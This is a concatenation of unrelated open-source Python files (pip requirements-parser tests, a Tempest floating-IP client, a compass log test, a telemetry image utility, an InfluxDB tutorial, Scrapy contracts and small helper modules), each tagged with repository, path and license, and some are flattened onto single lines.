        assert list(process_line(line, 'filename', 1)) == [(req, False)]

    def test_nested_constraints_file(self, monkeypatch):
        line = '-c another_file'
        req = InstallRequirement.from_line('SomeProject')
        import pip.req.req_file

        def stub_parse_requirements(req_url, finder, comes_from, options,
                                    session, wheel_cache, constraint):
            return [(req, constraint)]
        parse_requirements_stub = stub(call=stub_parse_requirements)
        monkeypatch.setattr(pip.req.req_file, 'parse_requirements',
                            parse_requirements_stub.call)
        assert list(process_line(line, 'filename', 1)) == [(req, True)]

    def test_options_on_a_requirement_line(self):
        line = 'SomeProject --install-option=yo1 --install-option yo2 '\
               '--global-option="yo3" --global-option "yo4"'
        filename = 'filename'
        req = list(process_line(line, filename, 1))[0]
        assert req.options == {
            'global_options': ['yo3', 'yo4'],
            'install_options': ['yo1', 'yo2']}

    def test_hash_options(self):
        """Test the --hash option: mostly its value storage.

        Make sure it reads and preserves multiple hashes.

        """
        line = ('SomeProject --hash=sha256:2cf24dba5fb0a30e26e83b2ac5b9e29e1b1'
                '61e5c1fa7425e73043362938b9824 '
                '--hash=sha384:59e1748777448c69de6b800d7a33bbfb9ff1b463e44354c'
                '3553bcdb9c666fa90125a3c79f90397bdf5f6a13de828684f '
                '--hash=sha256:486ea46224d1bb4fb680f34f7c9ad96a8f24ec88be73ea8'
                'e5a6c65260e9cb8a7')
        filename = 'filename'
        req = list(process_line(line, filename, 1))[0]
        assert req.options == {'hashes': {
            'sha256': ['2cf24dba5fb0a30e26e83b2ac5b9e29e1b161e5c1fa7425e730433'
                       '62938b9824',
                       '486ea46224d1bb4fb680f34f7c9ad96a8f24ec88be73ea8e5a6c65'
                       '260e9cb8a7'],
            'sha384': ['59e1748777448c69de6b800d7a33bbfb9ff1b463e44354c3553bcd'
                       'b9c666fa90125a3c79f90397bdf5f6a13de828684f']}}

    def test_set_isolated(self, options):
        line = 'SomeProject'
        filename = 'filename'
        options.isolated_mode = True
        result = process_line(line, filename, 1, options=options)
        assert list(result)[0].isolated

    def test_set_default_vcs(self, options):
        url = 'https://url#egg=SomeProject'
        line = '-e %s' % url
        filename = 'filename'
        options.default_vcs = 'git'
        result = process_line(line, filename, 1, options=options)
        assert list(result)[0].link.url == 'git+' + url

    def test_set_finder_no_index(self, finder):
        list(process_line("--no-index", "file", 1, finder=finder))
        assert finder.index_urls == []

    def test_set_finder_index_url(self, finder):
        list(process_line("--index-url=url", "file", 1, finder=finder))
        assert finder.index_urls == ['url']

    def test_set_finder_find_links(self, finder):
        list(process_line("--find-links=url", "file", 1, finder=finder))
        assert finder.find_links == ['url']

    def test_set_finder_extra_index_urls(self, finder):
        list(process_line("--extra-index-url=url", "file", 1, finder=finder))
        assert finder.index_urls == ['url']

    def test_set_finder_use_wheel(self, finder):
        list(process_line("--use-wheel", "file", 1, finder=finder))
        no_use_wheel_fmt = pip.index.FormatControl(set(), set())
        assert finder.format_control == no_use_wheel_fmt

    def test_set_finder_no_use_wheel(self, finder):
        list(process_line("--no-use-wheel", "file", 1, finder=finder))
        no_use_wheel_fmt = pip.index.FormatControl(set([':all:']), set())
        assert finder.format_control == no_use_wheel_fmt

    def test_set_finder_trusted_host(self, finder):
        list(process_line("--trusted-host=url", "file", 1, finder=finder))
        assert finder.secure_origins == [('*', 'url', '*')]

    def test_noop_always_unzip(self, finder):
        # noop, but confirm it can be set
        list(process_line("--always-unzip", "file", 1, finder=finder))

    def test_noop_finder_no_allow_unsafe(self, finder):
        # noop, but confirm it can be set
        list(process_line("--no-allow-insecure", "file", 1, finder=finder))

    def test_set_finder_allow_all_prereleases(self, finder):
        list(process_line("--pre", "file", 1, finder=finder))
        assert finder.allow_all_prereleases

    def test_relative_local_find_links(self, finder, monkeypatch):
        """
        Test a relative find_links path is joined with the req file directory
        """
        # Make sure the test also passes on windows
        req_file = os.path.normcase(os.path.abspath(
            os.path.normpath('/path/req_file.txt')))
        nested_link = os.path.normcase(os.path.abspath(
            os.path.normpath('/path/rel_path')))
        exists_ = os.path.exists

        def exists(path):
            if path == nested_link:
                return True
            else:
                # BUGFIX: the fallback used to drop the return value, so any
                # path other than nested_link looked nonexistent.
                return exists_(path)
        monkeypatch.setattr(os.path, 'exists', exists)
        list(process_line("--find-links=rel_path", req_file, 1,
                          finder=finder))
        assert finder.find_links == [nested_link]

    def test_relative_http_nested_req_files(self, finder, monkeypatch):
        """
        Test a relative nested req file path is joined with the req file url
        """
        req_file = 'http://me.com/me/req_file.txt'

        def parse(*args, **kwargs):
            return iter([])
        mock_parse = Mock()
        mock_parse.side_effect = parse
        monkeypatch.setattr(pip.req.req_file, 'parse_requirements',
                            mock_parse)
        list(process_line("-r reqs.txt", req_file, 1, finder=finder))
        call = mock_parse.mock_calls[0]
        assert call[1][0] == 'http://me.com/me/reqs.txt'

    def test_relative_local_nested_req_files(self, finder, monkeypatch):
        """
        Test a relative nested req file path is joined with the req file dir
        """
        req_file = os.path.normpath('/path/req_file.txt')

        def parse(*args, **kwargs):
            return iter([])
        mock_parse = Mock()
        mock_parse.side_effect = parse
        monkeypatch.setattr(pip.req.req_file, 'parse_requirements',
                            mock_parse)
        list(process_line("-r reqs.txt", req_file, 1, finder=finder))
        call = mock_parse.mock_calls[0]
        assert call[1][0] == os.path.normpath('/path/reqs.txt')

    def test_absolute_local_nested_req_files(self, finder, monkeypatch):
        """
        Test an absolute nested req file path
        """
        req_file = '/path/req_file.txt'

        def parse(*args, **kwargs):
            return iter([])
        mock_parse = Mock()
        mock_parse.side_effect = parse
        monkeypatch.setattr(pip.req.req_file, 'parse_requirements',
                            mock_parse)
        list(process_line("-r /other/reqs.txt", req_file, 1, finder=finder))
        call = mock_parse.mock_calls[0]
        assert call[1][0] == '/other/reqs.txt'

    def test_absolute_http_nested_req_file_in_local(self, finder,
                                                    monkeypatch):
        """
        Test a nested req file url in a local req file
        """
        req_file = '/path/req_file.txt'

        def parse(*args, **kwargs):
            return iter([])
        mock_parse = Mock()
        mock_parse.side_effect = parse
        monkeypatch.setattr(pip.req.req_file, 'parse_requirements',
                            mock_parse)
        list(process_line("-r http://me.com/me/reqs.txt", req_file, 1,
                          finder=finder))
        call = mock_parse.mock_calls[0]
        assert call[1][0] == 'http://me.com/me/reqs.txt'

    def test_set_finder_process_dependency_links(self, finder):
        list(process_line(
            "--process-dependency-links", "file", 1, finder=finder))
        assert finder.process_dependency_links


class TestBreakOptionsArgs(object):

    def test_no_args(self):
        assert ('', '--option') == break_args_options('--option')

    def test_no_options(self):
        assert ('arg arg', '') == break_args_options('arg arg')

    def test_args_short_options(self):
        result = break_args_options('arg arg -s')
        assert ('arg arg', '-s') == result

    def test_args_long_options(self):
        result = break_args_options('arg arg --long')
        assert ('arg arg', '--long') == result


class TestOptionVariants(object):

    # this suite is really just testing optparse, but added it anyway

    def test_variant1(self, finder):
        list(process_line("-i url", "file", 1, finder=finder))
        assert finder.index_urls == ['url']

    def test_variant2(self, finder):
        list(process_line("-i 'url'", "file", 1, finder=finder))
        assert finder.index_urls == ['url']

    def test_variant3(self, finder):
        list(process_line("--index-url=url", "file", 1, finder=finder))
        assert finder.index_urls == ['url']

    def test_variant4(self, finder):
        list(process_line("--index-url url", "file", 1, finder=finder))
        assert finder.index_urls == ['url']

    def test_variant5(self, finder):
        list(process_line("--index-url='url'", "file", 1, finder=finder))
        assert finder.index_urls == ['url']


class TestParseRequirements(object):
    """tests for `parse_requirements`"""

    @pytest.mark.network
    def test_remote_reqs_parse(self):
        """
        Test parsing a simple remote requirements file
        """
        # this requirements file just contains a comment previously this has
        # failed in py3: https://github.com/pypa/pip/issues/760
        for req in parse_requirements(
                'https://raw.githubusercontent.com/pypa/'
                'pip-test-package/master/'
                'tests/req_just_comment.txt', session=PipSession()):
            pass

    def test_multiple_appending_options(self, tmpdir, finder, options):
        with open(tmpdir.join("req1.txt"), "w") as fp:
            fp.write("--extra-index-url url1 \n")
            fp.write("--extra-index-url url2 ")
        list(parse_requirements(tmpdir.join("req1.txt"), finder=finder,
                                session=PipSession(), options=options))
        assert finder.index_urls == ['url1', 'url2']

    def test_skip_regex(self, tmpdir, finder, options):
        options.skip_requirements_regex = '.*Bad.*'
        with open(tmpdir.join("req1.txt"), "w") as fp:
            fp.write("--extra-index-url Bad \n")
            fp.write("--extra-index-url Good ")
        list(parse_requirements(tmpdir.join("req1.txt"), finder=finder,
                                options=options, session=PipSession()))
        assert finder.index_urls == ['Good']

    def test_join_lines(self, tmpdir, finder):
        with open(tmpdir.join("req1.txt"), "w") as fp:
            fp.write("--extra-index-url url1 \\\n--extra-index-url url2")
        list(parse_requirements(tmpdir.join("req1.txt"), finder=finder,
                                session=PipSession()))
        assert finder.index_urls == ['url1', 'url2']

    def test_req_file_parse_no_only_binary(self, data, finder):
        list(parse_requirements(
            data.reqfiles.join("supported_options2.txt"), finder,
            session=PipSession()))
        expected = pip.index.FormatControl(set(['fred']), set(['wilma']))
        assert finder.format_control == expected

    def test_req_file_parse_comment_start_of_line(self, tmpdir, finder):
        """
        Test parsing comments in a requirements file
        """
        with open(tmpdir.join("req1.txt"), "w") as fp:
            fp.write("# Comment ")
        reqs = list(parse_requirements(tmpdir.join("req1.txt"), finder,
                    session=PipSession()))
        assert not reqs

    def test_req_file_parse_comment_end_of_line_with_url(self, tmpdir,
                                                         finder):
        """
        Test parsing comments in a requirements file
        """
        with open(tmpdir.join("req1.txt"), "w") as fp:
            fp.write("https://example.com/foo.tar.gz # Comment ")
        reqs = list(parse_requirements(tmpdir.join("req1.txt"), finder,
                    session=PipSession()))
        assert len(reqs) == 1
        assert reqs[0].link.url == "https://example.com/foo.tar.gz"

    def test_req_file_parse_egginfo_end_of_line_with_url(self, tmpdir,
                                                         finder):
        """
        Test parsing comments in a requirements file
        """
        with open(tmpdir.join("req1.txt"), "w") as fp:
            fp.write("https://example.com/foo.tar.gz#egg=wat")
        reqs = list(parse_requirements(tmpdir.join("req1.txt"), finder,
                    session=PipSession()))
        assert len(reqs) == 1
        assert reqs[0].name == "wat"

    def test_req_file_no_finder(self, tmpdir):
        """
        Test parsing a requirements file without a finder
        """
        with open(tmpdir.join("req.txt"), "w") as fp:
            fp.write("""
    --find-links https://example.com/
    --index-url https://example.com/
    --extra-index-url https://two.example.com/
    --no-use-wheel
    --no-index
            """)
        parse_requirements(tmpdir.join("req.txt"), session=PipSession())

    def test_install_requirements_with_options(self, tmpdir, finder, session,
                                               options):
        global_option = '--dry-run'
        install_option = '--prefix=/opt'

        content = '''
        --only-binary :all:
        INITools==2.0 --global-option="{global_option}" \
                        --install-option "{install_option}"
        '''.format(global_option=global_option,
                   install_option=install_option)

        with requirements_file(content, tmpdir) as reqs_file:
            req = next(parse_requirements(reqs_file.abspath,
                                          finder=finder,
                                          options=options,
                                          session=session))

        req.source_dir = os.curdir
        with patch.object(subprocess, 'Popen') as popen:
            popen.return_value.stdout.readline.return_value = ""
            try:
                req.install([])
            except Exception:
                # install() aborts against the mocked Popen; we only need the
                # command line it attempted to run.
                pass

        call = popen.call_args_list[0][0][0]
        assert call.index(install_option) > \
            call.index('install') > \
            call.index(global_option) > 0
        assert options.format_control.no_binary == set([':all:'])
        assert options.format_control.only_binary == set([])
mit
cisco-openstack/tempest
tempest/lib/services/compute/floating_ips_client.py
2
4648
# Copyright 2012 OpenStack Foundation
# All Rights Reserved.
#
#    Licensed under the Apache License, Version 2.0 (the "License"); you may
#    not use this file except in compliance with the License. You may obtain
#    a copy of the License at
#
#         http://www.apache.org/licenses/LICENSE-2.0
#
#    Unless required by applicable law or agreed to in writing, software
#    distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
#    WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
#    License for the specific language governing permissions and limitations
#    under the License.

from oslo_serialization import jsonutils as json
from six.moves.urllib import parse as urllib

from tempest.lib.api_schema.response.compute.v2_1 import floating_ips \
    as schema
from tempest.lib.common import rest_client
from tempest.lib import exceptions as lib_exc
from tempest.lib.services.compute import base_compute_client


class FloatingIPsClient(base_compute_client.BaseComputeClient):
    """Client for the Nova os-floating-ips API."""

    def list_floating_ips(self, **params):
        """Returns a list of all floating IPs filtered by any parameters.

        For a full list of available parameters, please refer to the official
        API reference:
        https://docs.openstack.org/api-ref/compute/#list-floating-ip-addresses
        """
        uri = 'os-floating-ips'
        if params:
            # Optional filters are passed through as a query string.
            uri = '%s?%s' % (uri, urllib.urlencode(params))
        resp, resp_body = self.get(uri)
        resp_body = json.loads(resp_body)
        self.validate_response(schema.list_floating_ips, resp, resp_body)
        return rest_client.ResponseBody(resp, resp_body)

    def show_floating_ip(self, floating_ip_id):
        """Get the details of a floating IP.

        For a full list of available parameters, please refer to the official
        API reference:
        https://docs.openstack.org/api-ref/compute/#show-floating-ip-address-details
        """
        resp, resp_body = self.get("os-floating-ips/%s" % floating_ip_id)
        resp_body = json.loads(resp_body)
        self.validate_response(schema.create_get_floating_ip, resp, resp_body)
        return rest_client.ResponseBody(resp, resp_body)

    def create_floating_ip(self, **kwargs):
        """Allocate a floating IP to the project.

        For a full list of available parameters, please refer to the official
        API reference:
        https://docs.openstack.org/api-ref/compute/#create-allocate-floating-ip-address
        """
        resp, resp_body = self.post('os-floating-ips', json.dumps(kwargs))
        resp_body = json.loads(resp_body)
        self.validate_response(schema.create_get_floating_ip, resp, resp_body)
        return rest_client.ResponseBody(resp, resp_body)

    def delete_floating_ip(self, floating_ip_id):
        """Deletes the provided floating IP from the project.

        For a full list of available parameters, please refer to the official
        API reference:
        https://docs.openstack.org/api-ref/compute/#delete-deallocate-floating-ip-address
        """
        resp, resp_body = self.delete("os-floating-ips/%s" % floating_ip_id)
        self.validate_response(schema.add_remove_floating_ip, resp, resp_body)
        return rest_client.ResponseBody(resp, resp_body)

    def associate_floating_ip_to_server(self, floating_ip, server_id):
        """Associate the provided floating IP to a specific server."""
        request_body = json.dumps(
            {'addFloatingIp': {'address': floating_ip}})
        resp, resp_body = self.post("servers/%s/action" % server_id,
                                    request_body)
        self.validate_response(schema.add_remove_floating_ip, resp, resp_body)
        return rest_client.ResponseBody(resp, resp_body)

    def disassociate_floating_ip_from_server(self, floating_ip, server_id):
        """Disassociate the provided floating IP from a specific server."""
        request_body = json.dumps(
            {'removeFloatingIp': {'address': floating_ip}})
        resp, resp_body = self.post("servers/%s/action" % server_id,
                                    request_body)
        self.validate_response(schema.add_remove_floating_ip, resp, resp_body)
        return rest_client.ResponseBody(resp, resp_body)

    def is_resource_deleted(self, id):
        # A NotFound from the show call is taken as proof of deletion.
        try:
            self.show_floating_ip(id)
        except lib_exc.NotFound:
            return True
        else:
            return False

    @property
    def resource_type(self):
        """Returns the primary type of resource this client works with."""
        return 'floating_ip'
apache-2.0
cluckmaster/MissionPlanner
LogAnalyzer/tests/TestCompass.py
140
6039
from LogAnalyzer import Test,TestResult
import DataflashLog

import math


class TestCompass(Test):
    '''test for compass offsets and throttle interference'''

    def __init__(self):
        Test.__init__(self)
        self.name = "Compass"

    def run(self, logdata, verbose):
        """Check compass offset params, logged MAG offsets and field length.

        Sets self.result.status to GOOD/WARN/FAIL and accumulates
        human-readable lines in self.result.statusMessage.
        """
        self.result = TestResult()
        self.result.status = TestResult.StatusType.GOOD

        def vec_len(x):
            # Euclidean length of a 3-vector (indexable x, y, z).
            return math.sqrt(x[0]**2 + x[1]**2 + x[2]**2)

        def FAIL():
            self.result.status = TestResult.StatusType.FAIL

        def WARN():
            # never downgrade an already-FAILed result to WARN
            if self.result.status != TestResult.StatusType.FAIL:
                self.result.status = TestResult.StatusType.WARN

        try:
            warnOffset = 300
            failOffset = 500

            # 1. configured compass offset parameters
            param_offsets = (
                logdata.parameters["COMPASS_OFS_X"],
                logdata.parameters["COMPASS_OFS_Y"],
                logdata.parameters["COMPASS_OFS_Z"]
            )
            if vec_len(param_offsets) > failOffset:
                FAIL()
                self.result.statusMessage = "FAIL: Large compass offset params (X:%.2f, Y:%.2f, Z:%.2f)\n" % (param_offsets[0], param_offsets[1], param_offsets[2])
            elif vec_len(param_offsets) > warnOffset:
                WARN()
                self.result.statusMessage = "WARN: Large compass offset params (X:%.2f, Y:%.2f, Z:%.2f)\n" % (param_offsets[0], param_offsets[1], param_offsets[2])

            # 2. largest offsets actually recorded in the MAG log channel
            if "MAG" in logdata.channels:
                log_offsets = zip(
                    map(lambda x: x[1], logdata.channels["MAG"]["OfsX"].listData),
                    map(lambda x: x[1], logdata.channels["MAG"]["OfsY"].listData),
                    map(lambda x: x[1], logdata.channels["MAG"]["OfsZ"].listData)
                )
                # max() with a key replaces the previous bare reduce(), which
                # is py2-only (functools.reduce on py3).
                max_log_offsets = max(log_offsets, key=vec_len)
                if vec_len(max_log_offsets) > failOffset:
                    FAIL()
                    self.result.statusMessage += "FAIL: Large compass offset in MAG data (X:%.2f, Y:%.2f, Z:%.2f)\n" % (max_log_offsets[0], max_log_offsets[1], max_log_offsets[2])
                elif vec_len(max_log_offsets) > warnOffset:
                    WARN()
                    self.result.statusMessage += "WARN: Large compass offset in MAG data (X:%.2f, Y:%.2f, Z:%.2f)\n" % (max_log_offsets[0], max_log_offsets[1], max_log_offsets[2])

            # 3. check for mag field length change, and length outside of
            #    recommended range
            if "MAG" in logdata.channels:
                percentDiffThresholdWARN = 0.25
                percentDiffThresholdFAIL = 0.35
                minMagFieldThreshold = 120.0
                maxMagFieldThreshold = 550.0
                (minMagField, maxMagField) = (None, None)
                (minMagFieldLine, maxMagFieldLine) = (None, None)
                zerosFound = False
                length = len(logdata.channels["MAG"]["MagX"].listData)
                for index in range(length):
                    mx = logdata.channels["MAG"]["MagX"].listData[index][1]
                    my = logdata.channels["MAG"]["MagY"].listData[index][1]
                    mz = logdata.channels["MAG"]["MagZ"].listData[index][1]
                    if (mx == 0) and (my == 0) and (mz == 0):
                        # sometimes they're zero, not sure why, same reason as
                        # why we get NaNs as offsets?
                        zerosFound = True
                    else:
                        mf = math.sqrt(mx*mx + my*my + mz*mz)
                        # BUGFIX: previously min/max were seeded only when the
                        # FIRST sample was non-zero and were compared against
                        # None otherwise (a py3 TypeError, and wrong on py2).
                        # Seed from the first valid sample instead.
                        if (minMagField is None) or (mf < minMagField):
                            minMagField = mf
                            minMagFieldLine = logdata.channels["MAG"]["MagX"].listData[index][0]
                        if (maxMagField is None) or (mf > maxMagField):
                            maxMagField = mf
                            maxMagFieldLine = logdata.channels["MAG"]["MagX"].listData[index][0]

                if minMagField is not None:
                    percentDiff = (maxMagField - minMagField) / minMagField
                    if percentDiff > percentDiffThresholdFAIL:
                        FAIL()
                        self.result.statusMessage = self.result.statusMessage + "Large change in mag_field (%.2f%%)\n" % (percentDiff*100)
                    elif percentDiff > percentDiffThresholdWARN:
                        WARN()
                        self.result.statusMessage = self.result.statusMessage + "Moderate change in mag_field (%.2f%%)\n" % (percentDiff*100)
                    else:
                        self.result.statusMessage = self.result.statusMessage + "mag_field interference within limits (%.2f%%)\n" % (percentDiff*100)
                    if minMagField < minMagFieldThreshold:
                        self.result.statusMessage = self.result.statusMessage + "Min mag field length (%.2f) < recommended (%.2f)\n" % (minMagField, minMagFieldThreshold)
                    if maxMagField > maxMagFieldThreshold:
                        self.result.statusMessage = self.result.statusMessage + "Max mag field length (%.2f) > recommended (%.2f)\n" % (maxMagField, maxMagFieldThreshold)
                if zerosFound:
                    WARN()
                    self.result.statusMessage = self.result.statusMessage + "All zeros found in MAG X/Y/Z log data\n"
                if verbose and (minMagField is not None):
                    self.result.statusMessage = self.result.statusMessage + "Min mag_field of %.2f on line %d\n" % (minMagField, minMagFieldLine)
                    self.result.statusMessage = self.result.statusMessage + "Max mag_field of %.2f on line %d\n" % (maxMagField, maxMagFieldLine)
            else:
                self.result.statusMessage = self.result.statusMessage + "No MAG data, unable to test mag_field interference\n"

        except KeyError as e:
            self.result.status = TestResult.StatusType.FAIL
            self.result.statusMessage = str(e) + ' not found'
gpl-3.0
catapult-project/catapult
telemetry/telemetry/util/image_util.py
3
4042
# Copyright 2014 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.

"""Provides implementations of basic image processing functions.

Implements basic image processing functions, such as reading/writing images,
cropping, finding the bounding box of a color and diffing images.

When numpy is present, image_util_numpy_impl is used for the implementation of
this interface. The old bitmap implementation (image_util_bitmap_impl) is used
as a fallback when numpy is not present."""

# pylint: disable=wrong-import-position
from __future__ import absolute_import
import base64

from telemetry.internal.util import external_modules

np = external_modules.ImportOptionalModule('numpy')
# Backend selection happens once at import time: numpy-based implementation
# when numpy is importable, otherwise the pure-Python bitmap fallback. Every
# public function below is a thin delegation to this `impl` module.
if np is None:
  from telemetry.internal.image_processing import image_util_bitmap_impl
  impl = image_util_bitmap_impl
else:
  from telemetry.internal.image_processing import image_util_numpy_impl
  impl = image_util_numpy_impl
# pylint: enable=wrong-import-position


def Channels(image):
  """Number of color channels in the image."""
  return impl.Channels(image)


def Width(image):
  """Width of the image."""
  return impl.Width(image)


def Height(image):
  """Height of the image."""
  return impl.Height(image)


def Pixels(image):
  """Flat RGB pixel array of the image."""
  return impl.Pixels(image)


def GetPixelColor(image, x, y):
  """Returns a RgbaColor for the pixel at (x, y)."""
  return impl.GetPixelColor(image, x, y)


def WritePngFile(image, path):
  """Write an image to a PNG file.

  Args:
    image: an image object.
    path: The path to the PNG file. Must end in 'png' or an AssertionError
        will be raised."""
  # NOTE(review): this assert is stripped under `python -O`; it appears to be
  # a developer aid rather than input validation.
  assert path.endswith('png')
  return impl.WritePngFile(image, path)


def FromRGBPixels(width, height, pixels, bpp=3):
  """Create an image from an array of rgb pixels.

  Ignores alpha channel if present.

  Args:
    width, height: int, the width and height of the image.
    pixels: The flat array of pixels in the form of
        [r,g,b[,a],r,g,b[,a],...]
    bpp: 3 for RGB, 4 for RGBA."""
  return impl.FromRGBPixels(width, height, pixels, bpp)


def FromPng(png_data):
  """Create an image from raw PNG data."""
  return impl.FromPng(png_data)


def FromPngFile(path):
  """Create an image from a PNG file.

  Args:
    path: The path to the PNG file."""
  return impl.FromPngFile(path)


def FromBase64Png(base64_png):
  """Create an image from raw PNG data encoded in base64."""
  return FromPng(base64.b64decode(base64_png))


def AreEqual(image1, image2, tolerance=0, likely_equal=True):
  """Determines whether two images are identical within a given tolerance.

  Setting likely_equal to False enables short-circuit equality testing, which
  is about 2-3x slower for equal images, but can be image height times faster
  if the images are not equal."""
  return impl.AreEqual(image1, image2, tolerance, likely_equal)


def Diff(image1, image2):
  """Returns a new image that represents the difference between this image
  and another image."""
  return impl.Diff(image1, image2)


def GetBoundingBox(image, color, tolerance=0):
  """Finds the minimum box surrounding all occurrences of bgr |color|.

  Ignores the alpha channel.

  Args:
    color: RbgaColor, bounding box color.
    tolerance: int, per-channel tolerance for the bounding box color.

  Returns:
    (top, left, width, height), match_count"""
  return impl.GetBoundingBox(image, color, tolerance)


def Crop(image, left, top, width, height):
  """Crops the current image down to the specified box."""
  return impl.Crop(image, left, top, width, height)


def GetColorHistogram(image, ignore_color=None, tolerance=0):
  """Computes a histogram of the pixel colors in this image.

  Args:
    ignore_color: An RgbaColor to exclude from the bucket counts.
    tolerance: A tolerance for the ignore_color.

  Returns:
    A ColorHistogram namedtuple with 256 integers in each field: r, g, and
    b."""
  return impl.GetColorHistogram(image, ignore_color, tolerance)
bsd-3-clause
bjorand/influxdb-python
examples/tutorial.py
9
1778
import argparse from influxdb import InfluxDBClient def main(host='localhost', port=8086): user = 'root' password = 'root' dbname = 'example' dbuser = 'smly' dbuser_password = 'my_secret_password' query = 'select value from cpu_load_short;' json_body = [ { "measurement": "cpu_load_short", "tags": { "host": "server01", "region": "us-west" }, "time": "2009-11-10T23:00:00Z", "fields": { "value": 0.64 } } ] client = InfluxDBClient(host, port, user, password, dbname) print("Create database: " + dbname) client.create_database(dbname) print("Create a retention policy") client.create_retention_policy('awesome_policy', '3d', 3, default=True) print("Switch user: " + dbuser) client.switch_user(dbuser, dbuser_password) print("Write points: {0}".format(json_body)) client.write_points(json_body) print("Queying data: " + query) result = client.query(query) print("Result: {0}".format(result)) print("Switch user: " + user) client.switch_user(user, password) print("Drop database: " + dbname) client.drop_database(dbname) def parse_args(): parser = argparse.ArgumentParser( description='example code to play with InfluxDB') parser.add_argument('--host', type=str, required=False, default='localhost', help='hostname of InfluxDB http API') parser.add_argument('--port', type=int, required=False, default=8086, help='port of InfluxDB http API') return parser.parse_args() if __name__ == '__main__': args = parse_args() main(host=args.host, port=args.port)
mit
famorted/scrapy
scrapy/contracts/default.py
153
2334
from scrapy.item import BaseItem from scrapy.http import Request from scrapy.exceptions import ContractFail from . import Contract # contracts class UrlContract(Contract): """ Contract to set the url of the request (mandatory) @url http://scrapy.org """ name = 'url' def adjust_request_args(self, args): args['url'] = self.args[0] return args class ReturnsContract(Contract): """ Contract to check the output of a callback general form: @returns request(s)/item(s) [min=1 [max]] e.g.: @returns request @returns request 2 @returns request 2 10 @returns request 0 10 """ name = 'returns' objects = { 'request': Request, 'requests': Request, 'item': (BaseItem, dict), 'items': (BaseItem, dict), } def __init__(self, *args, **kwargs): super(ReturnsContract, self).__init__(*args, **kwargs) assert len(self.args) in [1, 2, 3] self.obj_name = self.args[0] or None self.obj_type = self.objects[self.obj_name] try: self.min_bound = int(self.args[1]) except IndexError: self.min_bound = 1 try: self.max_bound = int(self.args[2]) except IndexError: self.max_bound = float('inf') def post_process(self, output): occurrences = 0 for x in output: if isinstance(x, self.obj_type): occurrences += 1 assertion = (self.min_bound <= occurrences <= self.max_bound) if not assertion: if self.min_bound == self.max_bound: expected = self.min_bound else: expected = '%s..%s' % (self.min_bound, self.max_bound) raise ContractFail("Returned %s %s, expected %s" % \ (occurrences, self.obj_name, expected)) class ScrapesContract(Contract): """ Contract to check presence of fields in scraped items @scrapes page_name page_body """ name = 'scrapes' def post_process(self, output): for x in output: if isinstance(x, (BaseItem, dict)): for arg in self.args: if not arg in x: raise ContractFail("'%s' field is missing" % arg)
bsd-3-clause
rentongzhang/servo
tests/wpt/web-platform-tests/tools/wptserve/wptserve/wptserve.py
515
1117
#!/usr/bin/env python import argparse import os import server def abs_path(path): return os.path.abspath(path) def parse_args(): parser = argparse.ArgumentParser(description="HTTP server designed for extreme flexibility " "required in testing situations.") parser.add_argument("document_root", action="store", type=abs_path, help="Root directory to serve files from") parser.add_argument("--port", "-p", dest="port", action="store", type=int, default=8000, help="Port number to run server on") parser.add_argument("--host", "-H", dest="host", action="store", type=str, default="127.0.0.1", help="Host to run server on") return parser.parse_args() def main(): args = parse_args() httpd = server.WebTestHttpd(host=args.host, port=args.port, use_ssl=False, certificate=None, doc_root=args.document_root) httpd.start() if __name__ == "__main__": main()
mpl-2.0
jose36/jmdl2
servers/uploadstation.py
44
1300
# -*- coding: utf-8 -*- #------------------------------------------------------------ # pelisalacarta - XBMC Plugin # Conector para uploadstation # http://blog.tvalacarta.info/plugin-xbmc/pelisalacarta/ #------------------------------------------------------------ import urlparse,urllib2,urllib,re import os from core import scrapertools from core import logger from core import config def get_video_url( page_url , premium = False , user="" , password="", video_password="" ): logger.info("[uploadstation.py] get_video_url(page_url='%s')" % page_url) video_urls = [] return video_urls # Encuentra vídeos del servidor en el texto pasado def find_videos(data): encontrados = set() devuelve = [] # http://uploaded.to/file/1haty8nt patronvideos = '(http://www.uploadstation.com/file/[a-zA-Z0-9]+)' logger.info("[uploadstation.py] find_videos #"+patronvideos+"#") matches = re.compile(patronvideos,re.DOTALL).findall(data) for match in matches: titulo = "[uploadstation]" url = match if url not in encontrados: logger.info(" url="+url) devuelve.append( [ titulo , url , 'uploadstation' ] ) encontrados.add(url) else: logger.info(" url duplicada="+url) return devuelve
gpl-2.0
zaccoz/odoo
addons/crm_claim/report/__init__.py
446
1080
# -*- coding: utf-8 -*- ############################################################################## # # OpenERP, Open Source Management Solution # Copyright (C) 2004-2010 Tiny SPRL (<http://tiny.be>). # # This program is free software: you can redistribute it and/or modify # it under the terms of the GNU Affero General Public License as # published by the Free Software Foundation, either version 3 of the # License, or (at your option) any later version. # # This program is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU Affero General Public License for more details. # # You should have received a copy of the GNU Affero General Public License # along with this program. If not, see <http://www.gnu.org/licenses/>. # ############################################################################## import crm_claim_report # vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:
agpl-3.0
fbossy/SickRage
lib/feedparser/sgmllib.py
24
17770
